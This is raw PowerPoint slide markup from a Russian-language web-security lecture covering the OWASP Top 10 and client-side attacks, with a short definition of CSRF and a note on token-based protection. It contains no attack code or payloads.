            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Рисунок 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C6307B-768B-429F-AC31-EFF5A5A6F71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18172" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Рисунок 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F605B97F-0C3E-46AD-88B5-F93B22F208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98961" y="2980002"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Рисунок 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773F03D8-34E7-48C1-8538-A5BF2127030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78939" y="2980002"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Рисунок 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14C9BB5-0A0C-4C41-93C8-AA7D478A5B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03332" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Рисунок 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{896677A2-9F46-4E43-85FD-57EE7019941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934972" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Рисунок 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ECD0B80-21A5-4B97-967F-E8F37BB9652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82008" y="2980002"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Рисунок 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB11E61-9A43-4937-BAD5-7A39CDAAEDA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72419" y="2980002"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Рисунок 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8B38756-193E-4CC0-B960-CD9D4EDF039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066514" y="2980002"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Рисунок 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C75EE3-4677-4501-B4EB-C94770817D3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576552" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Рисунок 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76F5271-FA32-401B-8D42-DB5C891EAE94}"/>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6651928" y="1615123"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Рисунок 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D666D196-6B6D-4B33-9CBA-2FAA9DCC34A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2777712" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Рисунок 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDF091A4-E1AA-4F4F-979C-D4BA1D84936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071060" y="1615123"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Рисунок 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62895746-6DEE-47D7-847B-B6A185D8D72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609991" y="2980002"/>
            <a:ext cx="448999" cy="448999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Рисунок 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B325A5A1-CD03-46E7-8139-B8627438939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827199" y="2980002"/>
            <a:ext cx="448999" cy="448999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Рисунок 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36A3F4CB-3218-4443-AEE4-E652DED31CD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8264684" y="1615123"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Рисунок 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E77DDDCA-964D-470D-8149-C4CAA7C32E8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458306" y="1622743"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Рисунок 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F9B903D-7274-4EE6-B5A6-1F3F2C6FC17F}"/>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4246368" y="2930550"/>
            <a:ext cx="547901" cy="547901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Рисунок 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9492E1DA-EE7C-4244-BDD7-39F08F93DA9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845550" y="1615123"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Рисунок 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6EEBC7-6D95-4B3D-AF28-413CDA6B37F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5039172" y="1592263"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Рисунок 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65223F8-E5EA-4261-AD0C-D551D9869CED}"/>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331666" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Рисунок 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D33EEA9C-C86A-441C-A6AF-CC6AB295E4CF}"/>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066514" y="4425714"/>
            <a:ext cx="448998" cy="448998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1415337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7241" y="851342"/>
            <a:ext cx="5900057" cy="1910443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Спасибо </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>за внимание</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197441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37C9E92-DE88-11F2-6D9A-EF3BDD1BB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381" y="1545771"/>
            <a:ext cx="10429231" cy="4635214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC0127DE-99CC-4F1B-A5EB-D677515D2DBA}"/>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OWASP TOP10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D6A1C6-D883-4FDC-8C67-7D01F3292359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1123166"/>
            <a:ext cx="7179127" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Распределение уязвимостей по категориям </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>OWASP TOP10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> в 2021 году</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774325A3-6278-4C9D-846F-32681B2C143B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800"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panose="02000503030000020004"/>
              </a:rPr>
              <a:t>OWASP TOP10</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1683795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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50B6A619-F4C0-4666-86B8-AC0E9AACCEF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640265" y="898072"/>
            <a:ext cx="6742274" cy="833746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="6600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="6600" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Client-Side: XXS, CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="5400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3086581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FB18B6D-6C51-4F38-B155-E7FABE061F9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Client-Side: XXS, CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8065AA39-B788-4A7F-99DC-C23C1E47C51D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124450" y="2008138"/>
            <a:ext cx="6342062" cy="2308324"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Подделка межсайтовых запросов (CSRF/XSRF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>- это атака, которая заставляет конечного пользователя выполнять нежелательные действия в веб-приложении, в котором он в настоящее время аутентифицирован. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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Атаки CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>нацелены именно на запросы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>, изменяющие состояние, а не на кражу данных, поскольку у атакующего нет возможности увидеть ответ на поддельный запрос.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32FECE9-5353-4B26-8621-81027A7FDC49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124450" y="310757"/>
            <a:ext cx="6624638"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panose="02000503030000020004"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1677238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FB18B6D-6C51-4F38-B155-E7FABE061F9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Client-Side: XXS, CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D37315E-8824-4423-A691-FBDD0633CE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6394225" y="1770354"/>
            <a:ext cx="4852035" cy="3524042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="359410" marR="36195" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>П</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>р</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ед</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</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вра</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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-55" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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можно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-15" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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уникальн</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ы</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м</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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токеном</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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в</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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каждом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
